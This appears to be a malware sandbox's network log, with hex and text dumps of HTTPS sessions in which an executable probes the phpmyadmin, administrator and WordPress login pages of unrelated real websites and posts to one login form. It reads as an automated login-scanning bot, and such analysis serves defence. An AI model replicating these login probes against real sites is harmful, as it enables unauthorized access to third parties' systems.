                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 6625Connection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EnginePrag
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC6625INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 49 53 20 4f 66 66 72 6f 61 64 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; TIS Offroad &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javascri


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    328192.168.2.463749120.88.73.238443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC245OUTGET /login/?page=%2Fphpmyadmin%2F HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=m8r73sfk2fugohr6q21ktgilm1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC543INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 33 20 53 65 65 20 4f 74 68 65 72 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 303 See OtherServer: nginxDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    329192.168.2.46410418.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC224OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC218INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 61 67 72 69 63 6f 6c 61 2e 63 6f 6d 2e 62 72 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rechagricola.com.br/administrator/index.php
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    330192.168.2.464041194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC165OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC628INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 77 70 2f 76 32 2f 70 61 67 65 73 2f 32 38 3e 3b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 3b 20 74 79
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKdate: Sun, 26 Nov 2023 05:59:42 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12link: <https://www.maxiv.lu.se/wp-json/>; rel="https://api.w.org/"link: <https://www.maxiv.lu.se/wp-json/wp/v2/pages/28>; rel="alternate"; ty
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC6276INData Raw: 31 38 37 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 4d 41 58 20 49 56 20 26 23 38 32 31 31 3b 20 57 65 20 6d 61 6b 65 20 74 68 65 20 69 6e 76 69 73 69 62
                                                                                                                                                                                                    Data Ascii: 187C<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>MAX IV &#8211; We make the invisib
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC6748INData Raw: 31 41 35 34 0d 0a 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f
                                                                                                                                                                                                    Data Ascii: 1A54vid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{co
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16314INData Raw: 33 46 42 32 0d 0a 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6d 61 78 69 76 2f 63 73 73 2f 68 69 67 68 6c 69 67 68 74 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 2e 30 2e 30 2e 31 36 38 32 36 37 34 33 32 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6a 71 75 65 72 79 2d 75 69 2d 73 74 79 6c 65 73 2d 63 73 73 27 20 68 72 65 66 3d 27 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 75 69 2f 31 2e 31 33 2e 31 2f 74 68 65 6d 65 73 2f 62 61 73 65 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e
                                                                                                                                                                                                    Data Ascii: 3FB2' href='https://www.maxiv.lu.se/wp-content/themes/maxiv/css/highlight.min.css?ver=1.0.0.1682674322' media='all' /><link rel='stylesheet' id='jquery-ui-styles-css' href='//code.jquery.com/ui/1.13.1/themes/base/jquery-ui.css?ver=6.4.1' media='all' />
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC10662INData Raw: 32 39 39 45 0d 0a 2e 39 35 20 32 34 2e 35 2d 37 2e 30 34 20 31 2e 32 33 20 36 2e 37 31 20 32 2e 33 34 20 31 33 2e 35 38 20 33 2e 33 32 20 32 30 2e 35 39 2d 37 2e 38 36 2d 34 2e 30 37 2d 31 35 2e 38 36 2d 38 2d 32 34 2e 30 31 2d 31 31 2e 38 7a 6d 2d 32 31 38 2e 37 33 20 37 32 2e 35 32 63 2d 32 38 2e 39 36 2d 32 39 2e 36 31 2d 34 31 2e 38 35 2d 35 36 2e 36 39 2d 33 34 2e 35 31 2d 37 32 2e 34 35 20 36 2e 32 35 2d 31 33 2e 33 39 20 32 38 2e 31 36 2d 32 30 2e 38 34 20 35 39 2e 39 35 2d 32 30 2e 38 34 20 35 2e 36 31 20 30 20 31 31 2e 35 33 2e 32 33 20 31 37 2e 37 33 2e 37 20 31 31 2e 31 36 2e 38 35 20 32 32 2e 39 20 32 2e 34 34 20 33 35 2e 30 37 20 34 2e 37 31 2d 32 2e 36 37 20 31 34 2e 34 32 2d 34 2e 38 32 20 32 39 2e 34 39 2d 36 2e 34 31 20 34 35 2e 30 33 2d
                                                                                                                                                                                                    Data Ascii: 299E.95 24.5-7.04 1.23 6.71 2.34 13.58 3.32 20.59-7.86-4.07-15.86-8-24.01-11.8zm-218.73 72.52c-28.96-29.61-41.85-56.69-34.51-72.45 6.25-13.39 28.16-20.84 59.95-20.84 5.61 0 11.53.23 17.73.7 11.16.85 22.9 2.44 35.07 4.71-2.67 14.42-4.82 29.49-6.41 45.03-
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16322INData Raw: 33 46 42 41 0d 0a 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 32 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 75 73 65 72 2d 61 63 63 65 73 73 2f 63 61 6c 6c 2d 66 6f 72 2d 70 72 6f 70 6f 73 61 6c 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 20 66 6f 72 20 70 72 6f 70 6f 73 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68
                                                                                                                                                                                                    Data Ascii: 3FBAitem-object-page item-depth-2'><a href="https://www.maxiv.lu.se/user-access/call-for-proposals/" class="menu-item-label">Call for proposals</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16328INData Raw: 33 46 43 30 0d 0a 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e
                                                                                                                                                                                                    Data Ascii: 3FC0 submenu-toggler d-none minus-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children item-depth-5'><a href="https://www.maxiv.lu.
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16320INData Raw: 33 46 42 38 0d 0a 74 6f 6d 61 78 2f 75 73 65 72 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 55 73 65 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 70 6c 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 61 64 64 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73
                                                                                                                                                                                                    Data Ascii: 3FB8tomax/user-information/" class="menu-item-label">User information</a><span class="material-icon submenu-toggler plus-icon" aria-hidden="true"><span class="material-icons-sharp">add</span></span><span class="material-icon submenu-toggler d-none minus
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16320INData Raw: 33 46 42 38 0d 0a 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6e 6f 2d 62 6f 72 64 65 72 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 68 69 70 70 69 65 2f 65 78 70 65 72 69 6d 65 6e 74 61 6c 2d 73 74 61 74 69 6f 6e 2f 73 6f 6c 69 64 2d 6c 69 71 75 69 64 2d 62 72 61 6e 63 68 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 53 6f 6c 69 64 2d 4c 69 71 75 69 64 20 42 72 61 6e 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 2f 75 6c
                                                                                                                                                                                                    Data Ascii: 3FB8e-post_type menu-item-object-page no-border item-depth-5'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/hippie/experimental-station/solid-liquid-branch/" class="menu-item-label">Solid-Liquid Branch</a></li><li></li></ul></li></ul
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC16328INData Raw: 33 46 43 30 0d 0a 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 76 65 72 69 74 61 73 2f 62 65 61 6d 6c 69 6e 65 2d 6f 70 74 69 63 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 42 65 61 6d 6c 69 6e 65 20 6f 70 74 69 63 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22
                                                                                                                                                                                                    Data Ascii: 3FC0age item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/veritas/beamline-optics/" class="menu-item-label">Beamline optics</a></li><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-4'><a href="


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    331192.168.2.46412054.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC250OUTGET /Security/login?BackURL=%2Fadmin%2Fpages%2F HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PHPSESSID=m4dctrurspuesp0b7frt4pped2
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC333INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 78 2d 66 72 61 6d 65 2d 6f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 78 2d 72 6f 62 6f 74 73 2d 74 61 67 3a 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:42 GMTServer: Apache/2.4.52 (Ubuntu)x-frame-options: SAMEORIGINx-robots-tag: noindex, nofollowvary: X-Forwarded-Protocol,Accept-Encodingcache-control: no-cache, no-store, must-revalidateConnection:
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC7859INData Raw: 32 61 64 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4c 6f
                                                                                                                                                                                                    Data Ascii: 2ad4<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Lo
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC3111INData Raw: 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 72 65 73 6f 75 72 63 65 73 2f 74 68 65 6d 65 73 2f 6d 61 69 6e 2f 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2e 69 66 72 61 6d 65 2d 74 72 61 6e 73 70 6f 72 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 72 65 73 6f 75 72 63 65 73 2f 74 68 65 6d 65 73 2f 6d 61 69 6e 2f 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2e 66 69 6c 65 75 70 6c 6f 61 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 56 61 6c 69 64 61 74 65 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 61 73 70 6e 65 74 63 64 6e 2e 63 6f 6d 2f 61 6a 61 78 2f
                                                                                                                                                                                                    Data Ascii: <script src="/resources/themes/main/js/vendor/jquery.iframe-transport.js"></script> <script src="/resources/themes/main/js/vendor/jquery.fileupload.js"></script> ... Validate --> <script src="//ajax.aspnetcdn.com/ajax/
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    332192.168.2.464115162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC398OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=nmvmuaeqvtv9ahtlqhgrbkp69n
